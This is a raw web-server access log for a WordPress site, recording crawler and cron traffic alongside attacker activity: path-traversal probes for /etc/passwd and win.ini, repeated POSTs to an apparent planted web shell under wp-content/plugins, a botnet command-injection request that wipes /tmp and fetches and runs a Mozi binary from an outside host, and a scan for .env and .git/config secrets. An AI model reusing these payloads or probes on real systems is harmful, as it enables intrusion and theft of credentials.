116.179.37.137 - - [23/Jul/2026:21:50:47 +0800] "GET /wp-content/uploads/2026/04/1775698332-Article_images_W900px.webp HTTP/1.1" 200 49852 "http://cqqizhou.com/news/tag/%E5%8D%9A%E8%81%94%E8%BE%BE" "Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)"
116.179.37.176 - - [23/Jul/2026:21:50:47 +0800] "GET /wp-content/uploads/2026/01/1770349139-202624Article_images_W900%C3%97500px20260-.webp HTTP/1.1" 200 58006 "http://cqqizhou.com/news/tag/%E5%8D%9A%E8%81%94%E8%BE%BE" "Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)"
36.133.115.36 - - [23/Jul/2026:21:56:04 +0800] "POST /wp-cron.php?doing_wp_cron=1784814964.3960969448089599609375 HTTP/1.1" 200 31 "-" "WordPress/7.0; http://cqqizhou.com"
160.202.230.30 - - [23/Jul/2026:21:56:04 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36"
160.202.230.30 - - [23/Jul/2026:21:56:06 +0800] "GET /index.php HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36"
160.202.230.30 - - [23/Jul/2026:21:56:07 +0800] "GET //etc/passwd HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0"
36.133.115.36 - - [23/Jul/2026:21:56:08 +0800] "POST /wp-cron.php?doing_wp_cron=1784814968.3554248809814453125000 HTTP/1.1" 200 31 "-" "WordPress/7.0; http://cqqizhou.com"
160.202.230.30 - - [23/Jul/2026:21:56:08 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0"
160.202.230.30 - - [23/Jul/2026:21:56:08 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0"
160.202.230.30 - - [23/Jul/2026:21:56:10 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0"
160.202.230.30 - - [23/Jul/2026:21:56:10 +0800] "GET //windows/win.ini HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0"
160.202.230.30 - - [23/Jul/2026:21:56:10 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0"
160.202.230.30 - - [23/Jul/2026:21:56:11 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0"
160.202.230.30 - - [23/Jul/2026:21:56:12 +0800] "GET //Windows%5Cwin.ini HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0"
160.202.230.30 - - [23/Jul/2026:21:56:12 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0"
160.202.230.30 - - [23/Jul/2026:21:56:50 +0800] "GET / HTTP/1.1" 200 35518 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36"
160.202.230.30 - - [23/Jul/2026:21:56:50 +0800] "GET / HTTP/1.1" 200 35518 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36"
160.202.230.30 - - [23/Jul/2026:21:56:51 +0800] "GET /index.php HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36"
160.202.230.30 - - [23/Jul/2026:21:56:51 +0800] "GET / HTTP/1.1" 200 35518 "-" "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0"
160.202.230.30 - - [23/Jul/2026:21:56:51 +0800] "GET / HTTP/1.1" 200 35518 "-" "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0"
160.202.230.30 - - [23/Jul/2026:21:56:52 +0800] "GET / HTTP/1.1" 200 35518 "-" "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0"
160.202.230.30 - - [23/Jul/2026:21:56:52 +0800] "GET / HTTP/1.1" 200 35518 "-" "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0"
160.202.230.30 - - [23/Jul/2026:21:56:52 +0800] "GET / HTTP/1.1" 200 35518 "-" "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0"
160.202.230.30 - - [23/Jul/2026:21:56:52 +0800] "GET / HTTP/1.1" 200 35518 "-" "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0"
160.202.230.30 - - [23/Jul/2026:21:56:53 +0800] "GET //etc/passwd HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0"
160.202.230.30 - - [23/Jul/2026:21:56:54 +0800] "GET //windows/win.ini HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0"
160.202.230.30 - - [23/Jul/2026:21:56:55 +0800] "GET //Windows%5Cwin.ini HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0"
36.133.115.36 - - [23/Jul/2026:21:57:38 +0800] "POST /wp-cron.php?doing_wp_cron=1784815058.4765570163726806640625 HTTP/1.1" 200 31 "-" "WordPress/7.0; http://cqqizhou.com"
110.249.201.2 - - [23/Jul/2026:21:57:38 +0800] "GET / HTTP/1.1" 200 35069 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; https://zhanzhang.toutiao.com/)"
196.196.53.94 - - [23/Jul/2026:22:06:40 +0800] "GET /contacts HTTP/1.0" 200 79845 "http://cqqizhou.com/contacts" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
36.133.115.36 - - [23/Jul/2026:22:06:44 +0800] "POST /wp-cron.php?doing_wp_cron=1784815604.6845009326934814453125 HTTP/1.1" 200 31 "-" "WordPress/7.0; http://cqqizhou.com"
196.196.53.94 - - [23/Jul/2026:22:06:45 +0800] "POST /contacts HTTP/1.0" 200 72608 "http://cqqizhou.com/contacts" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
36.133.115.36 - - [23/Jul/2026:22:16:50 +0800] "POST /wp-cron.php?doing_wp_cron=1784816210.7340400218963623046875 HTTP/1.1" 200 31 "-" "WordPress/7.0; http://cqqizhou.com"
43.165.7.132 - - [23/Jul/2026:22:16:50 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.165.7.132 - - [23/Jul/2026:22:16:53 +0800] "GET / HTTP/1.1" 200 35068 "http://36.133.115.36" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
123.88.253.45 - - [23/Jul/2026:22:20:13 +0800] "GET / HTTP/1.1" 200 35518 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
36.133.115.36 - - [23/Jul/2026:22:26:33 +0800] "POST /wp-cron.php?doing_wp_cron=1784816793.7499771118164062500000 HTTP/1.1" 200 31 "-" "WordPress/7.0; http://cqqizhou.com"
43.165.126.130 - - [23/Jul/2026:22:26:33 +0800] "GET / HTTP/1.1" 200 35069 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
137.220.138.26 - - [23/Jul/2026:22:55:21 +0800] "GET /wp-content/plugins/wp2shell_84908442/hello.php HTTP/1.1" 200 31 "-" "Mozilla/5.0 (compatible;Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)"
210.16.163.146 - - [23/Jul/2026:22:55:47 +0800] "GET / HTTP/1.1" 200 35518 "http://cqqizhou.com/" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
36.133.115.36 - - [23/Jul/2026:22:55:49 +0800] "POST /wp-cron.php?doing_wp_cron=1784818549.3903729915618896484375 HTTP/1.1" 200 31 "-" "WordPress/7.0; http://cqqizhou.com"
222.221.185.243 - - [23/Jul/2026:22:55:49 +0800] "GET / HTTP/1.1" 301 5 "http://www.cqqizhou.com/" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
222.221.185.243 - - [23/Jul/2026:22:55:49 +0800] "GET / HTTP/1.1" 200 35518 "http://www.cqqizhou.com/" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
137.220.138.26 - - [23/Jul/2026:22:56:44 +0800] "POST /wp-content/plugins/wp2shell_84908442/hello.php HTTP/1.1" 200 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 15_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.0 Mobile/15E148 Safari/604.1"
137.220.138.26 - - [23/Jul/2026:22:56:45 +0800] "POST /wp-content/plugins/wp2shell_84908442/hello.php HTTP/1.1" 200 75 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 15_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.0 Mobile/15E148 Safari/604.1"
137.220.138.26 - - [23/Jul/2026:22:56:46 +0800] "POST /wp-content/plugins/wp2shell_84908442/hello.php HTTP/1.1" 200 1168 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 15_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.0 Mobile/15E148 Safari/604.1"
137.220.138.26 - - [23/Jul/2026:22:56:47 +0800] "POST /wp-content/plugins/wp2shell_84908442/hello.php HTTP/1.1" 200 75 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 15_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.0 Mobile/15E148 Safari/604.1"
137.220.138.26 - - [23/Jul/2026:22:56:47 +0800] "POST /wp-content/plugins/wp2shell_84908442/hello.php HTTP/1.1" 200 75 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 15_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.0 Mobile/15E148 Safari/604.1"
137.220.138.26 - - [23/Jul/2026:22:56:59 +0800] "POST /wp-content/plugins/wp2shell_84908442/hello.php HTTP/1.1" 200 420 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 15_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.0 Mobile/15E148 Safari/604.1"
137.220.138.26 - - [23/Jul/2026:22:57:05 +0800] "POST /wp-content/plugins/wp2shell_84908442/hello.php HTTP/1.1" 200 704 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 15_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.0 Mobile/15E148 Safari/604.1"
137.220.138.26 - - [23/Jul/2026:22:57:16 +0800] "POST /wp-content/plugins/wp2shell_84908442/hello.php HTTP/1.1" 200 83 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 15_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.0 Mobile/15E148 Safari/604.1"
137.220.138.26 - - [23/Jul/2026:22:57:23 +0800] "POST /wp-content/plugins/wp2shell_84908442/hello.php HTTP/1.1" 200 420 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 15_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.0 Mobile/15E148 Safari/604.1"
137.220.138.26 - - [23/Jul/2026:22:57:35 +0800] "POST /wp-content/plugins/wp2shell_84908442/hello.php HTTP/1.1" 200 75 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 15_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.0 Mobile/15E148 Safari/604.1"
137.220.138.26 - - [23/Jul/2026:22:57:45 +0800] "GET /wp-content/1.php HTTP/1.1" 200 244 "-" "Mozilla/5.0 (compatible;Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)"
137.220.138.26 - - [23/Jul/2026:22:58:05 +0800] "POST /wp-content/plugins/wp2shell_84908442/hello.php HTTP/1.1" 200 328 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 15_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.0 Mobile/15E148 Safari/604.1"
137.220.138.26 - - [23/Jul/2026:22:58:10 +0800] "POST /wp-content/plugins/wp2shell_84908442/hello.php HTTP/1.1" 200 1316 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 15_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.0 Mobile/15E148 Safari/604.1"
137.220.138.26 - - [23/Jul/2026:22:58:19 +0800] "POST /wp-content/plugins/wp2shell_84908442/hello.php HTTP/1.1" 200 75 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 15_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.0 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [23/Jul/2026:22:58:26 +0800] "GET / HTTP/1.1" 200 159680 "-" "MyCustomUA/1.0"
137.220.138.26 - - [23/Jul/2026:22:58:29 +0800] "GET / HTTP/1.1" 200 35896 "-" "Mozilla/5.0 (compatible;Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)"
36.133.115.36 - - [23/Jul/2026:22:58:38 +0800] "GET / HTTP/1.1" 200 159680 "-" "MyCustomUA/1.0"
137.220.138.26 - - [23/Jul/2026:22:58:45 +0800] "GET /?Andd HTTP/1.1" 499 0 "-" "Mozilla/5.0 (compatible;Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)"
36.133.115.36 - - [23/Jul/2026:22:58:45 +0800] "GET / HTTP/1.1" 200 159680 "-" "MyCustomUA/1.0"
36.133.115.36 - - [23/Jul/2026:22:59:10 +0800] "GET / HTTP/1.1" 200 159680 "-" "MyCustomUA/1.0"
137.220.138.26 - - [23/Jul/2026:22:59:17 +0800] "GET /andd HTTP/1.1" 200 35831 "-" "Mozilla/5.0 (compatible;Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)"
137.220.138.26 - - [23/Jul/2026:22:59:17 +0800] "POST /wp-content/plugins/wp2shell_84908442/hello.php HTTP/1.1" 200 75 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 15_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.0 Mobile/15E148 Safari/604.1"
137.220.138.26 - - [23/Jul/2026:22:59:20 +0800] "GET /andd HTTP/1.1" 500 2719 "-" "Mozilla/5.0 (compatible;Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)"
137.220.138.26 - - [23/Jul/2026:22:59:22 +0800] "GET /andd HTTP/1.1" 500 2719 "-" "Mozilla/5.0 (compatible;Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)"
137.220.138.26 - - [23/Jul/2026:22:59:27 +0800] "GET /?andd HTTP/1.1" 500 2720 "-" "Mozilla/5.0 (compatible;Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)"
137.220.138.26 - - [23/Jul/2026:22:59:33 +0800] "POST /wp-content/plugins/wp2shell_84908442/hello.php HTTP/1.1" 200 75 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 15_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.0 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [23/Jul/2026:22:59:36 +0800] "POST /wp-cron.php?doing_wp_cron=1784818776.8272469043731689453125 HTTP/1.1" 200 31 "-" "WordPress/7.0; http://cqqizhou.com"
137.220.138.26 - - [23/Jul/2026:22:59:36 +0800] "GET /?andd HTTP/1.1" 200 35069 "-" "Mozilla/5.0 (compatible;Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)"
137.220.138.26 - - [23/Jul/2026:22:59:41 +0800] "GET /?sleep/5295688366.html HTTP/1.1" 499 0 "-" "Mozilla/5.0 (compatible;Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)"
137.220.138.26 - - [23/Jul/2026:22:59:42 +0800] "GET /?sleep/5295688366.html HTTP/1.1" 301 5 "-" "Mozilla/5.0 (compatible;Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)"
137.220.138.26 - - [23/Jul/2026:22:59:44 +0800] "GET /?sleep%2F5295688366_html HTTP/1.1" 200 35066 "-" "Mozilla/5.0 (compatible;Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)"
137.220.138.26 - - [23/Jul/2026:22:59:54 +0800] "POST /wp-content/plugins/wp2shell_84908442/hello.php HTTP/1.1" 200 75 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 15_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.0 Mobile/15E148 Safari/604.1"
137.220.138.26 - - [23/Jul/2026:22:59:55 +0800] "GET /?andd HTTP/1.1" 500 2720 "-" "Mozilla/5.0 (compatible;Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)"
137.220.138.26 - - [23/Jul/2026:23:00:02 +0800] "GET / HTTP/1.1" 200 36461 "-" "Mozilla/5.0 (compatible;Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)"
137.220.138.26 - - [23/Jul/2026:23:00:05 +0800] "GET /andd HTTP/1.1" 500 2719 "-" "Mozilla/5.0 (compatible;Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)"
137.220.138.26 - - [23/Jul/2026:23:00:08 +0800] "GET /andd HTTP/1.1" 500 2719 "-" "Mozilla/5.0 (compatible;Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)"
137.220.138.26 - - [23/Jul/2026:23:00:22 +0800] "GET /index.php/andd HTTP/1.1" 500 2729 "-" "Mozilla/5.0 (compatible;Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)"
137.220.138.26 - - [23/Jul/2026:23:00:49 +0800] "POST /wp-content/plugins/wp2shell_84908442/hello.php HTTP/1.1" 200 75 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 15_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.0 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [23/Jul/2026:23:00:50 +0800] "POST /wp-cron.php?doing_wp_cron=1784818850.6569080352783203125000 HTTP/1.1" 200 31 "-" "WordPress/7.0; http://cqqizhou.com"
180.244.187.150 - - [23/Jul/2026:23:00:50 +0800] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://180.244.187.150:56347/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0" 404 32849 "-" "-"
137.220.138.26 - - [23/Jul/2026:23:00:51 +0800] "GET / HTTP/1.1" 499 0 "-" "Mozilla/5.0 (compatible;Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)"
36.133.115.36 - - [23/Jul/2026:23:00:51 +0800] "GET / HTTP/1.1" 200 159688 "-" "MyCustomUA/1.0"
137.220.138.26 - - [23/Jul/2026:23:00:51 +0800] "GET / HTTP/1.1" 200 35907 "-" "Mozilla/5.0 (compatible;Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)"
137.220.138.26 - - [23/Jul/2026:23:01:29 +0800] "POST /wp-content/plugins/wp2shell_84908442/hello.php HTTP/1.1" 200 75 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 15_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.0 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [23/Jul/2026:23:01:31 +0800] "GET / HTTP/1.1" 200 159688 "-" "MyCustomUA/1.0"
137.220.138.26 - - [23/Jul/2026:23:01:33 +0800] "GET / HTTP/1.1" 200 35872 "-" "Mozilla/5.0 (compatible;Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)"
36.133.115.36 - - [23/Jul/2026:23:01:35 +0800] "GET / HTTP/1.1" 200 159680 "-" "MyCustomUA/1.0"
137.220.138.26 - - [23/Jul/2026:23:01:36 +0800] "GET /?show2/5353053309.html HTTP/1.1" 200 49524 "-" "Mozilla/5.0 (compatible;Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)"
137.220.138.26 - - [23/Jul/2026:23:01:39 +0800] "GET /?moban/9434998wvt.html HTTP/1.1" 499 0 "-" "Mozilla/5.0 (compatible;Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)"
36.133.108.121 - - [23/Jul/2026:23:01:42 +0800] "HEAD /wp-admin/update.php?action=upload-plugin HTTP/1.1" 499 0 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:24.0) Gecko/20100101 Firefox/24.0"
36.133.115.36 - - [23/Jul/2026:23:01:43 +0800] "POST /wp-cron.php?doing_wp_cron=1784818902.8672161102294921875000 HTTP/1.1" 200 31 "-" "WordPress/7.0; http://cqqizhou.com"
36.133.115.36 - - [23/Jul/2026:23:01:45 +0800] "GET / HTTP/1.1" 200 159688 "-" "MyCustomUA/1.0"
137.220.138.26 - - [23/Jul/2026:23:01:46 +0800] "GET /andd HTTP/1.1" 200 50513 "-" "Mozilla/5.0 (compatible;Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)"
137.220.138.26 - - [23/Jul/2026:23:01:54 +0800] "GET /andd HTTP/1.1" 301 5 "-" "Mozilla/5.0 (compatible;Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)"
36.133.115.36 - - [23/Jul/2026:23:01:54 +0800] "GET / HTTP/1.1" 200 159680 "-" "MyCustomUA/1.0"
137.220.138.26 - - [23/Jul/2026:23:01:55 +0800] "GET /andd HTTP/1.1" 200 50064 "-" "Mozilla/5.0 (compatible;Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)"
137.220.138.26 - - [23/Jul/2026:23:02:03 +0800] "POST /wp-content/plugins/wp2shell_84908442/hello.php HTTP/1.1" 200 75 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 15_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.0 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [23/Jul/2026:23:02:38 +0800] "GET / HTTP/1.1" 200 159680 "-" "MyCustomUA/1.0"
220.181.108.80 - - [23/Jul/2026:23:02:40 +0800] "GET /2464/ HTTP/1.1" 200 35869 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
36.133.115.36 - - [23/Jul/2026:23:11:27 +0800] "POST /wp-cron.php?doing_wp_cron=1784819486.7561390399932861328125 HTTP/1.1" 200 31 "-" "WordPress/7.0; http://cqqizhou.com"
89.34.96.151 - - [23/Jul/2026:23:11:27 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0"
36.133.115.36 - - [23/Jul/2026:23:23:51 +0800] "POST /wp-cron.php?doing_wp_cron=1784820231.2167949676513671875000 HTTP/1.1" 200 31 "-" "WordPress/7.0; http://cqqizhou.com"
107.23.10.184 - - [23/Jul/2026:23:23:51 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
36.133.115.36 - - [23/Jul/2026:23:28:18 +0800] "POST /wp-cron.php?doing_wp_cron=1784820497.9722640514373779296875 HTTP/1.1" 200 31 "-" "WordPress/7.0; http://cqqizhou.com"
160.119.71.9 - - [23/Jul/2026:23:28:18 +0800] "GET / HTTP/1.1" 200 109837 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:144.0) Gecko/20100101 Firefox/144.0"
36.133.115.36 - - [23/Jul/2026:23:42:35 +0800] "POST /wp-cron.php?doing_wp_cron=1784821355.1877210140228271484375 HTTP/1.1" 200 31 "-" "WordPress/7.0; http://cqqizhou.com"
34.96.49.105 - - [23/Jul/2026:23:42:35 +0800] "HEAD / HTTP/1.1" 301 0 "-" "Python-urllib/3.14"
34.96.49.105 - - [23/Jul/2026:23:42:36 +0800] "HEAD / HTTP/1.1" 200 0 "-" "Python-urllib/3.14"
34.96.49.105 - - [23/Jul/2026:23:42:37 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0"
34.96.49.105 - - [23/Jul/2026:23:42:39 +0800] "GET / HTTP/1.1" 200 35518 "-" "Mozilla/5.0"
34.96.49.105 - - [23/Jul/2026:23:42:42 +0800] "GET /index.php HTTP/1.1" 200 35068 "-" "Mozilla/5.0"
34.96.49.105 - - [23/Jul/2026:23:42:43 +0800] "GET /index.html HTTP/1.1" 200 8721 "-" "Mozilla/5.0"
34.96.49.105 - - [23/Jul/2026:23:42:49 +0800] "GET /public/.git/config HTTP/1.1" 404 9499 "-" "Mozilla/5.0"
34.96.49.105 - - [23/Jul/2026:23:42:49 +0800] "GET /internal/.git/config HTTP/1.1" 404 9499 "-" "Mozilla/5.0"
34.96.49.105 - - [23/Jul/2026:23:42:49 +0800] "GET /core/.env HTTP/1.1" 499 0 "-" "Mozilla/5.0"
34.96.49.105 - - [23/Jul/2026:23:42:49 +0800] "GET /application/.env HTTP/1.1" 499 0 "-" "Mozilla/5.0"
34.96.49.105 - - [23/Jul/2026:23:42:49 +0800] "GET /server/.env HTTP/1.1" 499 0 "-" "Mozilla/5.0"
34.96.49.105 - - [23/Jul/2026:23:42:49 +0800] "GET /storage/.git/config HTTP/1.1" 499 0 "-" "Mozilla/5.0"
34.96.49.105 - - [23/Jul/2026:23:42:49 +0800] "GET /vendor/.git/config HTTP/1.1" 499 0 "-" "Mozilla/5.0"
34.96.49.105 - - [23/Jul/2026:23:42:49 +0800] "GET /app/.git/config HTTP/1.1" 499 0 "-" "Mozilla/5.0"
34.96.49.105 - - [23/Jul/2026:23:42:49 +0800] "GET /config/.env HTTP/1.1" 499 0 "-" "Mozilla/5.0"
34.96.49.105 - - [23/Jul/2026:23:42:49 +0800] "GET /server/.git/config HTTP/1.1" 499 0 "-" "Mozilla/5.0"
34.96.49.105 - - [23/Jul/2026:23:42:49 +0800] "GET /wp-content/.git/config HTTP/1.1" 499 0 "-" "Mozilla/5.0"
34.96.49.105 - - [23/Jul/2026:23:42:49 +0800] "GET /app/.env HTTP/1.1" 499 0 "-" "Mozilla/5.0"
34.96.49.105 - - [23/Jul/2026:23:42:49 +0800] "GET /api/.env HTTP/1.1" 499 0 "-" "Mozilla/5.0"
34.96.49.105 - - [23/Jul/2026:23:42:49 +0800] "GET /admin/.env HTTP/1.1" 499 0 "-" "Mozilla/5.0"
34.96.49.105 - - [23/Jul/2026:23:42:49 +0800] "GET /mojo/core/.git/config HTTP/1.1" 499 0 "-" "Mozilla/5.0"
34.96.49.105 - - [23/Jul/2026:23:42:49 +0800] "GET /mojo/core/.env HTTP/1.1" 499 0 "-" "Mozilla/5.0"
34.96.49.105 - - [23/Jul/2026:23:42:49 +0800] "GET /.git/config HTTP/1.1" 499 0 "-" "Mozilla/5.0"
34.96.49.105 - - [23/Jul/2026:23:42:49 +0800] "GET /web/.git/config HTTP/1.1" 499 0 "-" "Mozilla/5.0"
34.96.49.105 - - [23/Jul/2026:23:42:49 +0800] "GET /wordpress/.git/config HTTP/1.1" 499 0 "-" "Mozilla/5.0"
34.96.49.105 - - [23/Jul/2026:23:42:49 +0800] "GET /.env HTTP/1.1" 499 0 "-" "Mozilla/5.0"
34.96.49.105 - - [23/Jul/2026:23:42:49 +0800] "GET /wordpress/.env HTTP/1.1" 499 0 "-" "Mozilla/5.0"
34.96.49.105 - - [23/Jul/2026:23:42:49 +0800] "GET /src/.git/config HTTP/1.1" 499 0 "-" "Mozilla/5.0"
34.96.49.105 - - [23/Jul/2026:23:42:49 +0800] "GET /internal/.env HTTP/1.1" 499 0 "-" "Mozilla/5.0"
34.96.49.105 - - [23/Jul/2026:23:42:49 +0800] "GET /laravel/.git/config HTTP/1.1" 499 0 "-" "Mozilla/5.0"
34.96.49.105 - - [23/Jul/2026:23:42:49 +0800] "GET /admin/.git/config HTTP/1.1" 499 0 "-" "Mozilla/5.0"
34.96.49.105 - - [23/Jul/2026:23:42:49 +0800] "GET /config/.git/config HTTP/1.1" 499 0 "-" "Mozilla/5.0"
34.96.49.105 - - [23/Jul/2026:23:42:49 +0800] "GET /public/.env HTTP/1.1" 499 0 "-" "Mozilla/5.0"
